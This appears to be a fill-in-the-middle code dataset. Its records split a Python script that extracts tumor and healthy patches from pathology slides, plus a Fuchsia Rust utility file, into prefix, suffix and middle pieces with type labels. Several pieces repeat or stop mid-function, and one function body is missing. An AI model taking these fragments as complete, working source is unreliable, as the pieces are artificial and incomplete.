tissue_ratio = np.sum(patch_tissue_lev1[:, :, 0]) / (patch_size ** 2)
# double-check if the patch has tumor
has_cancer = check_patch_centre(patch_mask_lev1, patch_centre)
# if it has more than 50% tissue and has tumor
if (tissue_ratio > 0.5) & has_cancer:
# collect lev1 patch
num_cancer += 1
table.loc[idx]=(slide_name,x0,y0,1)
idx+=1
# -------------------------------------------------------------
# extract HEALTHY patches
# repeat the above for the healthy pixels
print('extracting normal patches------')
#logging.info('extracting normal patches')
# print()
# get a random sample of healthy pixels
random_sample = min(len(list(zip(mask_lev_4_health[1], mask_lev_4_health[0])))-1, num_random_sample)
sample_health = random.sample(list(zip(mask_lev_4_health[1], mask_lev_4_health[0])), random_sample)
# print('-------checking sample_health------', len(sample_health))
c = 0
# get healthy images
while num_health < num_per_img:
c += 1
if c == random_sample:
break
# if c % 10 == 0:
# print(c, end=', ')
# get the next pixel from the sample - coordinates at level 4
(x4, y4) = sample_health[c]
# convert level 4 coordinates to level 0
x0 = x4 * (2 ** 4)
y0 = y4 * (2 ** 4)
# extract patches at lev1 CENTERED at that pixel
patch_image_lev1, patch_mask_lev1, patch_tissue_lev1 = \
get_patches(slide, tumor_mask, lev1, x0, y0, patch_size)
# calc tissue ratio in that patch
tissue_ratio = np.sum(patch_tissue_lev1[:, :, 0]) / (patch_size ** 2)
# check if the patch has tumor
has_cancer = check_patch_centre(patch_mask_lev1, patch_centre)
# if it has more than 50% tissue and doens't have tumor in the 128x128 centre
if (tissue_ratio > 0.5) & (not has_cancer):
# collect lev1 patch
num_health += 1
table.loc[idx]=(slide_name,x0,y0,0)
idx+=1
table.to_csv(save_folder,header=True)
return table
| d[x][y] = | identifier_name |
extract_patches2.py | """这里把slide read的时候的dimention换成了mask的dimention,为了防止大小不一样"""
from openslide import open_slide, __library_version__ as openslide_lib_version, __version__ as openslide_version
import numpy as np
import random, os, glob, time
import matplotlib.pyplot as plt
from matplotlib.colors import Normalize
from skimage.color import rgb2hsv
import pandas as pd
#from save_npy import get_arg
'''
args = get_arg()
# set levels: 0 to 7 (greater than 4 not recommended)
lev1 = args.lev1
lev2 = args.lev2
# set patch sizes (I don't recomment changing that, although making it smaller
# will decrease run time)
patch_size = args.patch_size
patch_centre = args.patch_centre
my_pre_process = 'rescale_' + str(lev1) + '-' + str(lev2)
# choose conv base: 'Inception' or 'my-conv-base'
my_conv_base = args.my_conv_base
model_name = 'multi-input_' + my_conv_base + '_lev' + str(lev1) + str(lev2)
is_trainval_test = args.is_trainval_test
tif_folder = args.tif_folder
mask_folder = args.mask_folder
save_folder = args.save_folder
num_per_img = args.num_per_img
num_random_sample = args.num_random_sample
'''
# =======================Collect train/val and test patches=======================
# functions provided by Joshua Gordon
# See https://openslide.org/api/python/#openslide.OpenSlide.read_region
# Note: x,y coords are with respect to level 0.
def read_slide(slide, x, y, level, width, height, as_float=False):
""" Read a region from the slide
Return a numpy RBG array
"""
im = slide.read_region((x, y), level, (width, height))
im = im.convert('RGB') # drop the alpha channel
if as_float:
im = np.asarray(im, dtype=np.float32)
else:
im = np.asarray(im)
assert im.shape == (height, width, 3) # 3:rgb
return im
'''
def find_tissue_pixels(image, intensity=0.8):
""" Return tissue pixels for an image
"""
im_gray = rgb2gray(image)
assert im_gray.shape == (image.shape[0], image.shape[1])
indices = np.where(im_gray <= intensity) # 返回满足条件的坐标,第一个数组是第一维度的坐标,第二个2
return zip(indices[0], indices[1])
'''
def find_tissue_pixels(image):
""" Return tissue pixels for an image
"""
img_RGB = np.array(image)
img_HSV = rgb2hsv(img_RGB)
background_R = img_RGB[:, :, 0] > 203
background_G = img_RGB[:, :, 1] > 191
background_B = img_RGB[:, :, 2] > 201
tissue_RGB = np.logical_not(background_R & background_G & background_B)
tissue_S = img_HSV[:, :, 1] > 0.1113
'''如果仅使用用threadshold,中间会有部份白色脂肪区域被隔离'''
rgb_min = 50
min_R = img_RGB[:, :, 0] > rgb_min
min_G = img_RGB[:, :, 1] > rgb_min
min_B = img_RGB[:, :, 2] > rgb_min
tissue_mask = tissue_S & tissue_RGB & min_R & min_G & min_B
indices = np.where(tissue_mask == 1)
return zip(indices[0], indices[1])
def apply_mask(im, mask, color=(1, 0, 0)):
""" Return the mask as an image
"""
masked = np.zeros(im.shape)
for x, y in mask: masked[x][y] = color
return masked
def get_patches(slide, tumor_mask, lev, x0, y0, patch_size):
""" Get patches from a slide: RBG image, tumor mask, tissue mask CENTERED at x0, y0
imputs:
- slide: OpenSlide object for RGB slide images
- tumor_mask: OpenSlide object for tumor masks
- lev: int, target zoom level for the patches, between 0 and 7
- x0, y0: int, pixel coordinates at level 0
- patch_size: int, usually 299
outputs:
- patch_image: array, RBG image
- patch_mask: array, tumor mask
- patch_tissue: array, tissue mask
"""
# calc downsample factor
downsample_factor = 2 ** lev
# calc new x and y so that the patch is CENTER at the input x and y
new_x = x0 - (patch_size // 2) * downsample_factor
new_y = y0 - (patch_size // 2) * downsample_factor
# read RGB patch
patch_image = read_slide(slide,
x=new_x,
y=new_y,
level=lev,
width=patch_size,
height=patch_size)
# read tumor mask
patch_mask = read_slide(tumor_mask,
x=new_x,
y=new_y,
level=lev,
width=patch_size,
height=patch_size)
# 1 channel is enough for the mask
patch_mask = patch_mask[:, :, 0]
# make tissue mask
tissue_pixels = find_tissue_pixels(patch_image)
patch_tissue = apply_mask(patch_image, tissue_pixels)
return patch_image, patch_mask, patch_tissue
def check_patch_centre(patch_mask, patch_centre):
""" Check if there is any tumor pixel in the 128x128 centre
inputs:
- patch_mask: array, tumor mask
- patch_centre: int, usually 128
outputs: Boolean
"""
# get patch size
patch_size = patch_mask.shape[0]
# get the offset to check the 128x128 centre
offset = int((patch_size - patch_centre) / 2)
# sum the pixels in the 128x128 centre for the tumor mask
sum_cancers = np.sum(patch_mask[offset:offset + patch_centre, offset:offset + patch_centre])
return sum_cancers > 0
def collect_patches(tif, mask, lev1, lev2, num_per_img, patch_size, patch_centre, save_folder, num_random_sample):
""" Extract patches with labels from the slides in the list
inputs:
- tif: tif
- mask: mask
- lev1: int, target zoom level for the patches, between 0 and 7 - higher resolution: lev1<lev2
- lev2: int, target zoom level for the patches, between 0 and 7 - lower resolution
- num_per_imgm: int, number of patches to extract per slide per class, usually 100
- patch_size: int, usually 299
- patch_centre: int, usually 128
save_folder: save csv file path.
outputs:
- patch_images: list, extracted patches as arrays
- patch_labels: list, labels of patches: 0 - healthy, 1 - tumor
- save a plot of the patches
"""
table=pd.DataFrame(columns=['slide_name','x','y','label'])
# init output lists
patch_images_lev1 = []
patch_images_lev2 = []
patch_labels = []
num_cancer = 0
num_health = 0
# file paths
slide_path = tif
mask_path = mask
f_num = slide_path.split('/')[-1].split('.')[0]
slide_name=os.path.basename(slide_path).rstrip('.tif')
# get images with OpenSlide
slide = open_slide(slide_path)
tumor_mask = open_slide(mask_path)
# read level 4 slide image and mask - for the purposes of getting healthy
# and tumor pixels
# 读取slide和mask,read_slide就是返回一shape == (height, width, 3) #3:rgb
slide_image = read_slide(slide,
x=0,
y=0,
level=4,
width=tumor_mask.level_dimensions[4][0],
height=tumor_mask.level_dimensions[4][1])
mask_image = read_slide(tumor_mask,
x=0,
y=0,
level=4,
width=tumor_mask.level_dimensions[4][0],
height=tumor_mask.level_dimensions[4][1])
print('--------checking mask image shape after read slide', mask_image.shape)
print('--------checking slide_image shape after read slide', slide_image.shape)
mask_image = mask_image[:, :, 0]
# print ('--------checking mask image shape after mask_image[:, :, 0]', mask_image.siz)
# get a list of tumor pixels at level 4
mask_lev_4_cancer = np.nonzero(mask_image)
# print ('checking length of mask_lev_4_cancer', mask_lev_4_cancer)
# make a healthy tissue mask by subtracting tumor mask from tissue mask
tissue_pixels = find_tissue_pixels(slide_image)
# print ('---checking tissue_pixels ', tissue_pixels )
tissue_regions = apply_mask(slide_image, tissue_pixels)
# print ('------checking tissue_regions', tissue_regions)
mask_health = tissue_regions[:, :, 0] - mask_image
# print ('------checking mask_health = tissue_regions[:, :, 0] - mask_image-------', mask_health.shape)
mask_health = mask_health > 0
# print ('------checking mask_health = mask_health > 0---------', mask_health.shape)
mask_health = mask_health.astype('int')
# print ('------checking mask_health = mask_health.astypeint-------', mask_health.shape)
# get a list of healthy pixels at level 4
mask_lev_4_health = np.nonzero(mask_health)
# print ('------checking mask_lev_4_health----', len(mask_lev_4_health[0]))
# print()
# print('lenmask_lev_4_cancerpatch_size ** 2, lenmask_lev_4_health0patch_size ** 2:',
# len(mask_lev_4_cancer[0]) // (patch_size ** 2), len(mask_lev_4_health[0]) // (patch_size ** 2))
# -------------------------------------------------------------
if len(mask_lev_4_cancer[0]) != 0:
print('extracting tumor patches------')
#logging.info('extracting tumor patches')
# extract TUMOR patches
# get a random sample of tumor pixels
# Note: did random.sample here rather than random.choice inside the while loop because os speed
random_sample = min(len(list(zip(mask_lev_4_cancer[1], mask_lev_4_cancer[0])))-1,num_random_sample)
sample_cancer = random.sample(list(zip(mask_lev_4_cancer[1], mask_lev_4_cancer[0])), random_sample)
c = 0
idx= 0
# continue until enough patches extracted
while num_cancer < num_per_img:
c += 1
if c == random_sample:
break
# print('-----checking-------c', c)
# if c % 10 == 0:
# print(c, end=', ')
# get the next pixel from the sample - coordinates at level4
(x4, y4) = sample_cancer[c]
# convert level 4 coordinates to level 0
x0 = x4 * (2 ** 4)
y0 = y4 * (2 ** 4)
# extract patches at lev1 CENTERED at that pixel
patch_image_lev1, patch_mask_lev1, patch_tissue_lev1 = \
get_patches(slide, tumor_mask, lev1, x0, y0, patch_size)
# calc tissue ratio in that patch
tissue_ratio = np.sum(patch_tissue_lev1[:, :, 0]) / (patch_size ** 2)
# double-check if the patch has tumor
has_cancer = check_patch_centre(patch_mask_lev1, patch_centre)
# if it has more than 50% tissue and has tumor
if (tissue_ratio > 0.5) & has_cancer:
# collect lev1 patch
num_cancer += 1
table.loc[idx]=(slide_name,x0,y0,1)
idx+=1
# -------------------------------------------------------------
| cting normal patches------')
#logging.info('extracting normal patches')
# print()
# get a random sample of healthy pixels
random_sample = min(len(list(zip(mask_lev_4_health[1], mask_lev_4_health[0])))-1, num_random_sample)
sample_health = random.sample(list(zip(mask_lev_4_health[1], mask_lev_4_health[0])), random_sample)
# print('-------checking sample_health------', len(sample_health))
c = 0
# get healthy images
while num_health < num_per_img:
c += 1
if c == random_sample:
break
# if c % 10 == 0:
# print(c, end=', ')
# get the next pixel from the sample - coordinates at level 4
(x4, y4) = sample_health[c]
# convert level 4 coordinates to level 0
x0 = x4 * (2 ** 4)
y0 = y4 * (2 ** 4)
# extract patches at lev1 CENTERED at that pixel
patch_image_lev1, patch_mask_lev1, patch_tissue_lev1 = \
get_patches(slide, tumor_mask, lev1, x0, y0, patch_size)
# calc tissue ratio in that patch
tissue_ratio = np.sum(patch_tissue_lev1[:, :, 0]) / (patch_size ** 2)
# check if the patch has tumor
has_cancer = check_patch_centre(patch_mask_lev1, patch_centre)
# if it has more than 50% tissue and doens't have tumor in the 128x128 centre
if (tissue_ratio > 0.5) & (not has_cancer):
# collect lev1 patch
num_health += 1
table.loc[idx]=(slide_name,x0,y0,0)
idx+=1
table.to_csv(save_folder,header=True)
return table
| # extract HEALTHY patches
# repeat the above for the healthy pixels
print('extra | conditional_block |
extract_patches2.py | """这里把slide read的时候的dimention换成了mask的dimention,为了防止大小不一样"""
from openslide import open_slide, __library_version__ as openslide_lib_version, __version__ as openslide_version
import numpy as np
import random, os, glob, time
import matplotlib.pyplot as plt
from matplotlib.colors import Normalize
from skimage.color import rgb2hsv
import pandas as pd
#from save_npy import get_arg
'''
args = get_arg()
# set levels: 0 to 7 (greater than 4 not recommended)
lev1 = args.lev1
lev2 = args.lev2
# set patch sizes (I don't recomment changing that, although making it smaller
# will decrease run time)
patch_size = args.patch_size
patch_centre = args.patch_centre
my_pre_process = 'rescale_' + str(lev1) + '-' + str(lev2)
# choose conv base: 'Inception' or 'my-conv-base'
my_conv_base = args.my_conv_base
model_name = 'multi-input_' + my_conv_base + '_lev' + str(lev1) + str(lev2)
is_trainval_test = args.is_trainval_test
tif_folder = args.tif_folder
mask_folder = args.mask_folder
save_folder = args.save_folder
num_per_img = args.num_per_img
num_random_sample = args.num_random_sample
'''
# =======================Collect train/val and test patches=======================
# functions provided by Joshua Gordon
# See https://openslide.org/api/python/#openslide.OpenSlide.read_region
# Note: x,y coords are with respect to level 0.
def read_slide(slide, x, y, level, width, height, as_float=False):
""" Read a region from the slide
Return a numpy RBG array
"""
im = slide.read_region((x, y), level, (width, height))
im = im.convert('RGB') # drop the alpha channel
if as_float:
im = np.asarray(im, dtype=np.float32)
else:
im = np.asarray(im)
assert im.shape == (height, width, 3) # 3:rgb
return im
'''
def find_tissue_pixels(image, intensity=0.8):
""" Return tissue pixels for an image
"""
im_gray = rgb2gray(image)
assert im_gray.shape == (image.shape[0], image.shape[1])
indices = np.where(im_gray <= intensity) # 返回满足条件的坐标,第一个数组是第一维度的坐标,第二个2
return zip(indices[0], indices[1])
'''
def find_tissue_pixels(image):
""" Return tissue pixels for an image
"""
img_RGB = np.array(image)
img_HSV = rgb2hsv(img_RGB)
background_R = img_RGB[:, :, 0] > 203
background_G = img_RGB[:, :, 1] > 191
background_B = img_RGB[:, :, 2] > 201
tissue_RGB = np.logical_not(background_R & background_G & background_B)
tissue_S = img_HSV[:, :, 1] > 0.1113
'''如果仅使用用threadshold,中间会有部份白色脂肪区域被隔离'''
rgb_min = 50
min_R = img_RGB[:, :, 0] > rgb_min
min_G = img_RGB[:, :, 1] > rgb_min
min_B = img_RGB[:, :, 2] > rgb_min
tissue_mask = tissue_S & tissue_RGB & min_R & min_G & min_B
indices = np.where(tissue_mask == 1)
return zip(indices[0], indices[1])
def apply_mask(im, mask, color=(1, 0, 0)):
""" Return the mask as an image
"""
masked = np.zeros(im.shape)
for x, y in mask: masked[x][y] = color
return masked
def get_patches(slide, tumor_mask, lev, x0, y0, patch_size):
""" Get patches from a slide: RBG image, tumor mask, tissue mask CENTERED at x0, y0
imputs:
- slide: OpenSlide object for RGB slide images
- tumor_mask: OpenSlide object for tumor masks
- lev: int, target zoom level for the patches, between 0 and 7
- x0, y0: int, pixel coordinates at level 0
- patch_size: int, usually 299
outputs:
- patch_image: array, RBG image
- patch_mask: array, tumor mask
- patch_tissue: array, tissue mask
"""
# calc downsample factor
downsample_factor = 2 ** lev
# calc new x and y so that the patch is CENTER at the input x and y
new_x = x0 - (patch_size // 2) * downsample_factor
new_y = y0 - (patch_size // 2) * downsample_factor
# read RGB patch
patch_image = read_slide(slide,
x=new_x,
y=new_y,
level=lev,
width=patch_size,
height=patch_size)
# read tumor mask
patch_mask = read_slide(tumor_mask,
x=new_x,
y=new_y,
level=lev,
width=patch_size,
height=patch_size)
# 1 channel is enough for the mask
patch_mask = patch_mask[:, :, 0]
# make tissue mask
tissue_pixels = find_tissue_pixels(patch_image)
patch_tissue = apply_mask(patch_image, tissue_pixels)
return patch_image, patch_mask, patch_tissue
def check_patch_centre(patch_mask, patch_centre):
""" Check if there is any tumor pixel in the 128x128 centre
inputs:
- patch_mask: array, tumor mask
- patch_centre: int, usually 128
outputs: Boolean
"""
# get patch size
patch_size = patch_mask.shape[0]
# get the offset to check the 128x128 centre
offset = int((patch_size - patch_centre) / 2)
# sum the pixels in the 128x128 centre for the tumor mask
sum_cancers = np.sum(patch_mask[offset:offset + patch_centre, offset:offset + patch_centre])
return sum_cancers > 0
def collect_patches(tif, mask, lev1, lev2, num_per_img, patch_size, patch_centre, save_folder, num_random_sample):
""" Extract patches with labels from the slides in the list | - lev1: int, target zoom level for the patches, between 0 and 7 - higher resolution: lev1<lev2
- lev2: int, target zoom level for the patches, between 0 and 7 - lower resolution
- num_per_imgm: int, number of patches to extract per slide per class, usually 100
- patch_size: int, usually 299
- patch_centre: int, usually 128
save_folder: save csv file path.
outputs:
- patch_images: list, extracted patches as arrays
- patch_labels: list, labels of patches: 0 - healthy, 1 - tumor
- save a plot of the patches
"""
table=pd.DataFrame(columns=['slide_name','x','y','label'])
# init output lists
patch_images_lev1 = []
patch_images_lev2 = []
patch_labels = []
num_cancer = 0
num_health = 0
# file paths
slide_path = tif
mask_path = mask
f_num = slide_path.split('/')[-1].split('.')[0]
slide_name=os.path.basename(slide_path).rstrip('.tif')
# get images with OpenSlide
slide = open_slide(slide_path)
tumor_mask = open_slide(mask_path)
# read level 4 slide image and mask - for the purposes of getting healthy
# and tumor pixels
# 读取slide和mask,read_slide就是返回一shape == (height, width, 3) #3:rgb
slide_image = read_slide(slide,
x=0,
y=0,
level=4,
width=tumor_mask.level_dimensions[4][0],
height=tumor_mask.level_dimensions[4][1])
mask_image = read_slide(tumor_mask,
x=0,
y=0,
level=4,
width=tumor_mask.level_dimensions[4][0],
height=tumor_mask.level_dimensions[4][1])
print('--------checking mask image shape after read slide', mask_image.shape)
print('--------checking slide_image shape after read slide', slide_image.shape)
mask_image = mask_image[:, :, 0]
# print ('--------checking mask image shape after mask_image[:, :, 0]', mask_image.siz)
# get a list of tumor pixels at level 4
mask_lev_4_cancer = np.nonzero(mask_image)
# print ('checking length of mask_lev_4_cancer', mask_lev_4_cancer)
# make a healthy tissue mask by subtracting tumor mask from tissue mask
tissue_pixels = find_tissue_pixels(slide_image)
# print ('---checking tissue_pixels ', tissue_pixels )
tissue_regions = apply_mask(slide_image, tissue_pixels)
# print ('------checking tissue_regions', tissue_regions)
mask_health = tissue_regions[:, :, 0] - mask_image
# print ('------checking mask_health = tissue_regions[:, :, 0] - mask_image-------', mask_health.shape)
mask_health = mask_health > 0
# print ('------checking mask_health = mask_health > 0---------', mask_health.shape)
mask_health = mask_health.astype('int')
# print ('------checking mask_health = mask_health.astypeint-------', mask_health.shape)
# get a list of healthy pixels at level 4
mask_lev_4_health = np.nonzero(mask_health)
# print ('------checking mask_lev_4_health----', len(mask_lev_4_health[0]))
# print()
# print('lenmask_lev_4_cancerpatch_size ** 2, lenmask_lev_4_health0patch_size ** 2:',
# len(mask_lev_4_cancer[0]) // (patch_size ** 2), len(mask_lev_4_health[0]) // (patch_size ** 2))
# -------------------------------------------------------------
if len(mask_lev_4_cancer[0]) != 0:
print('extracting tumor patches------')
#logging.info('extracting tumor patches')
# extract TUMOR patches
# get a random sample of tumor pixels
# Note: did random.sample here rather than random.choice inside the while loop because os speed
random_sample = min(len(list(zip(mask_lev_4_cancer[1], mask_lev_4_cancer[0])))-1,num_random_sample)
sample_cancer = random.sample(list(zip(mask_lev_4_cancer[1], mask_lev_4_cancer[0])), random_sample)
c = 0
idx= 0
# continue until enough patches extracted
while num_cancer < num_per_img:
c += 1
if c == random_sample:
break
# print('-----checking-------c', c)
# if c % 10 == 0:
# print(c, end=', ')
# get the next pixel from the sample - coordinates at level4
(x4, y4) = sample_cancer[c]
# convert level 4 coordinates to level 0
x0 = x4 * (2 ** 4)
y0 = y4 * (2 ** 4)
# extract patches at lev1 CENTERED at that pixel
patch_image_lev1, patch_mask_lev1, patch_tissue_lev1 = \
get_patches(slide, tumor_mask, lev1, x0, y0, patch_size)
# calc tissue ratio in that patch
tissue_ratio = np.sum(patch_tissue_lev1[:, :, 0]) / (patch_size ** 2)
# double-check if the patch has tumor
has_cancer = check_patch_centre(patch_mask_lev1, patch_centre)
# if it has more than 50% tissue and has tumor
if (tissue_ratio > 0.5) & has_cancer:
# collect lev1 patch
num_cancer += 1
table.loc[idx]=(slide_name,x0,y0,1)
idx+=1
# -------------------------------------------------------------
# extract HEALTHY patches
# repeat the above for the healthy pixels
print('extracting normal patches------')
#logging.info('extracting normal patches')
# print()
# get a random sample of healthy pixels
random_sample = min(len(list(zip(mask_lev_4_health[1], mask_lev_4_health[0])))-1, num_random_sample)
sample_health = random.sample(list(zip(mask_lev_4_health[1], mask_lev_4_health[0])), random_sample)
# print('-------checking sample_health------', len(sample_health))
c = 0
# get healthy images
while num_health < num_per_img:
c += 1
if c == random_sample:
break
# if c % 10 == 0:
# print(c, end=', ')
# get the next pixel from the sample - coordinates at level 4
(x4, y4) = sample_health[c]
# convert level 4 coordinates to level 0
x0 = x4 * (2 ** 4)
y0 = y4 * (2 ** 4)
# extract patches at lev1 CENTERED at that pixel
patch_image_lev1, patch_mask_lev1, patch_tissue_lev1 = \
get_patches(slide, tumor_mask, lev1, x0, y0, patch_size)
# calc tissue ratio in that patch
tissue_ratio = np.sum(patch_tissue_lev1[:, :, 0]) / (patch_size ** 2)
# check if the patch has tumor
has_cancer = check_patch_centre(patch_mask_lev1, patch_centre)
# if it has more than 50% tissue and doens't have tumor in the 128x128 centre
if (tissue_ratio > 0.5) & (not has_cancer):
# collect lev1 patch
num_health += 1
table.loc[idx]=(slide_name,x0,y0,0)
idx+=1
table.to_csv(save_folder,header=True)
return table | inputs:
- tif: tif
- mask: mask | random_line_split |
utils.rs | // Copyright 2020 The Fuchsia Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
/// Logs an error message if the passed in `result` is an error.
#[macro_export]
macro_rules! log_if_err {
($result:expr, $log_prefix:expr) => {
if let Err(e) = $result.as_ref() {
log::error!("{}: {}", $log_prefix, e);
}
};
}
/// Logs an error message if the provided `cond` evaluates to false. Also passes the same expression
/// and message into `debug_assert!`, which will panic if debug assertions are enabled.
#[macro_export]
macro_rules! log_if_false_and_debug_assert {
($cond:expr, $msg:expr) => {
if !($cond) {
log::error!($msg);
debug_assert!($cond, $msg);
}
};
($cond:expr, $fmt:expr, $($arg:tt)+) => {
if !($cond) {
log::error!($fmt, $($arg)+);
debug_assert!($cond, $fmt, $($arg)+);
}
};
}
#[cfg(test)]
mod log_err_with_debug_assert_tests {
use crate::log_if_false_and_debug_assert;
/// Tests that `log_if_false_and_debug_assert` panics for a false expression when debug
/// assertions are enabled.
#[test]
#[should_panic(expected = "this will panic")]
#[cfg(debug_assertions)]
fn test_debug_assert() {
log_if_false_and_debug_assert!(true, "this will not panic");
log_if_false_and_debug_assert!(false, "this will panic");
}
/// Tests that `log_if_false_and_debug_assert` does not panic for a false expression when debug
/// assertions are not enabled.
#[test]
#[cfg(not(debug_assertions))]
fn test_non_debug_assert() {
log_if_false_and_debug_assert!(true, "this will not panic");
log_if_false_and_debug_assert!(false, "this will not panic either");
}
}
/// Export the `connect_to_driver` function to be used throughout the crate.
pub use connect_to_driver::connect_to_driver;
mod connect_to_driver {
use anyhow::{format_err, Error};
use fidl::endpoints::Proxy as _;
use fidl_fuchsia_io::{NodeProxy, OPEN_RIGHT_READABLE, OPEN_RIGHT_WRITABLE};
/// Returns a NodeProxy opened at `path`. The path is guaranteed to exist before the connection
/// is opened.
async fn connect_channel(path: &str) -> Result<NodeProxy, Error> |
/// Connects to the driver at `path`, returning a proxy of the specified type. The path is
/// guaranteed to exist before the connection is opened.
///
/// TODO(fxbug.dev/81378): factor this function out to a common library
pub async fn connect_to_driver<T: fidl::endpoints::ProtocolMarker>(
path: &str,
) -> Result<T::Proxy, Error> {
match path.strip_prefix("/dev/") {
Some(path) => fidl::endpoints::ClientEnd::<T>::new(
connect_channel(path)
.await?
.into_channel()
.map_err(|_| format_err!("into_channel failed on NodeProxy"))?
.into_zx_channel(),
)
.into_proxy()
.map_err(Into::into),
None => Err(format_err!("Path must start with /dev/")),
}
}
#[cfg(test)]
mod tests {
use super::*;
use async_utils::PollExt as _;
use fidl::endpoints::{create_proxy, Proxy, ServerEnd};
use fidl_fuchsia_io::{
DirectoryMarker, NodeMarker, MODE_TYPE_DIRECTORY, OPEN_RIGHT_READABLE,
OPEN_RIGHT_WRITABLE,
};
use fuchsia_async as fasync;
use futures::TryStreamExt as _;
use std::sync::Arc;
use vfs::{
directory::entry::DirectoryEntry, directory::helper::DirectlyMutable,
execution_scope::ExecutionScope, file::vmo::read_only_static, pseudo_directory,
};
fn bind_to_dev(dir: Arc<dyn DirectoryEntry>) {
let (dir_proxy, dir_server) = create_proxy::<DirectoryMarker>().unwrap();
let scope = ExecutionScope::new();
dir.open(
scope,
OPEN_RIGHT_READABLE | OPEN_RIGHT_WRITABLE,
MODE_TYPE_DIRECTORY,
vfs::path::Path::dot(),
ServerEnd::new(dir_server.into_channel()),
);
let ns = fdio::Namespace::installed().unwrap();
ns.bind("/dev", dir_proxy.into_channel().unwrap().into_zx_channel()).unwrap();
}
/// Tests that `connect_to_driver` returns success for the valid existing path.
#[fasync::run_singlethreaded(test)]
async fn test_connect_to_driver_success() {
bind_to_dev(pseudo_directory! {
"class" => pseudo_directory!{
"thermal" => pseudo_directory! {
"000" => read_only_static("string beans")
}
}
});
connect_to_driver::<NodeMarker>("/dev/class/thermal/000").await.unwrap();
}
/// Tests that `connect_to_driver` doesn't return until the required path is added.
#[test]
fn test_connect_to_driver_late_add() {
let mut executor = fasync::TestExecutor::new().unwrap();
let thermal_dir = pseudo_directory! {
"000" => read_only_static("string cheese (cheddar)")
};
bind_to_dev(pseudo_directory! {
"class" => pseudo_directory!{
"thermal" => thermal_dir.clone()
}
});
let connect_future =
&mut Box::pin(connect_to_driver::<NodeMarker>("/dev/class/thermal/001"));
// The required path is initially not present
assert!(executor.run_until_stalled(connect_future).is_pending());
// Add the required path
thermal_dir.add_entry("001", read_only_static("string cheese (mozzarella)")).unwrap();
// Verify the wait future now returns successfully
assert!(executor.run_until_stalled(connect_future).unwrap().is_ok());
}
/// Tests that `connect_to_driver` correctly waits even if the required parent directory
/// does not yet exist.
#[test]
fn test_connect_to_driver_nonexistent_parent_dir() {
let mut executor = fasync::TestExecutor::new().unwrap();
bind_to_dev(pseudo_directory! {
"class" => pseudo_directory!{
"cpu" => pseudo_directory! {
"000" => read_only_static("shoestring fries")
}
}
});
assert!(executor
.run_until_stalled(&mut Box::pin(connect_to_driver::<NodeMarker>(
"/dev/class/thermal/000"
)))
.is_pending());
}
/// Tests that the proxy returned by `connect_to_driver` is usable for sending a FIDL
/// request.
#[fasync::run_singlethreaded(test)]
async fn test_connect_to_driver_gives_usable_proxy() {
use fidl_fuchsia_device as fdev;
// Create a pseudo directory with a fuchsia.device.Controller FIDL server hosted at
// class/fake_dev_controller and bind it to our /dev
bind_to_dev(pseudo_directory! {
"class" => pseudo_directory! {
"fake_dev_controller" => vfs::service::host(
move |mut stream: fdev::ControllerRequestStream| {
async move {
match stream.try_next().await.unwrap() {
Some(fdev::ControllerRequest::GetCurrentPerformanceState {
responder
}) => {
let _ = responder.send(8);
}
e => panic!("Unexpected request: {:?}", e),
}
}
}
)
}
});
// Connect to the driver and call GetCurrentPerformanceState on it
let result = crate::utils::connect_to_driver::<fdev::ControllerMarker>(
"/dev/class/fake_dev_controller",
)
.await
.expect("Failed to connect to driver")
.get_current_performance_state()
.await
.expect("get_current_performance_state FIDL failed");
// Verify we receive the expected result
assert_eq!(result, 8);
}
/// Verifies that invalid arguments are rejected while valid ones are accepted.
#[fasync::run_singlethreaded(test)]
async fn test_connect_to_driver_valid_path() {
bind_to_dev(pseudo_directory! {
"class" => pseudo_directory!{
"cpu" => pseudo_directory! {
"000" => read_only_static("stringtown population 1")
}
}
});
connect_to_driver::<NodeMarker>("/svc/fake_service").await.unwrap_err();
connect_to_driver::<NodeMarker>("/dev/class/cpu/000").await.unwrap();
}
}
}
/// The number of nanoseconds since the system was powered on.
pub fn get_current_timestamp() -> crate::types::Nanoseconds {
crate::types::Nanoseconds(fuchsia_async::Time::now().into_nanos())
}
use fidl_fuchsia_cobalt::HistogramBucket;
/// Convenient wrapper for creating and storing an integer histogram to use with Cobalt.
pub struct CobaltIntHistogram {
/// Underlying histogram data storage.
data: Vec<HistogramBucket>,
/// Number of data values that have been added to the histogram.
data_count: u32,
/// Histogram configuration parameters.
config: CobaltIntHistogramConfig,
}
/// Histogram configuration parameters used by CobaltIntHistogram.
pub struct CobaltIntHistogramConfig {
pub floor: i64,
pub num_buckets: u32,
pub step_size: u32,
}
impl CobaltIntHistogram {
/// Create a new CobaltIntHistogram.
pub fn new(config: CobaltIntHistogramConfig) -> Self {
Self { data: Self::new_vec(config.num_buckets), data_count: 0, config }
}
/// Create a new Vec<HistogramBucket> that represents the underlying histogram storage. Two
/// extra buckets are added for underflow and overflow.
fn new_vec(num_buckets: u32) -> Vec<HistogramBucket> {
(0..num_buckets + 2).map(|i| HistogramBucket { index: i, count: 0 }).collect()
}
/// Add a data value to the histogram.
pub fn add_data(&mut self, n: i64) {
// Add one to index to account for underflow bucket at index 0
let mut index = 1 + (n - self.config.floor) / self.config.step_size as i64;
// Clamp index to 0 and self.data.len() - 1, which Cobalt uses for underflow and overflow,
// respectively
index = num_traits::clamp(index, 0, self.data.len() as i64 - 1);
self.data[index as usize].count += 1;
self.data_count += 1;
}
/// Get the number of data elements that have been added to the histogram.
pub fn count(&self) -> u32 {
self.data_count
}
/// Clear the histogram.
pub fn clear(&mut self) {
self.data = Self::new_vec(self.config.num_buckets);
self.data_count = 0;
}
/// Get the underlying Vec<HistogramBucket> of the histogram.
pub fn get_data(&self) -> Vec<HistogramBucket> {
self.data.clone()
}
}
// Finds all of the node config files under the test package's "/config/data" directory. The node
// config files are identified by a suffix of "node_config.json". The function then calls the
// provided `test_config_file` function for each found config file, passing the JSON structure in as
// an argument. The function returns success if each call to `test_config_file` succeeds. Otherwise,
// the first error encountered is returned.
#[cfg(test)]
pub fn test_each_node_config_file(
test_config_file: impl Fn(&Vec<serde_json::Value>) -> Result<(), anyhow::Error>,
) -> Result<(), anyhow::Error> {
use anyhow::Context as _;
use serde_json as json;
use std::fs;
use std::fs::File;
use std::io::BufReader;
let config_files = fs::read_dir("/config/data")
.unwrap()
.filter(|f| f.as_ref().unwrap().file_name().to_str().unwrap().ends_with("node_config.json"))
.map(|f| {
let path = f.unwrap().path();
let file_path = path.to_str().unwrap().to_string();
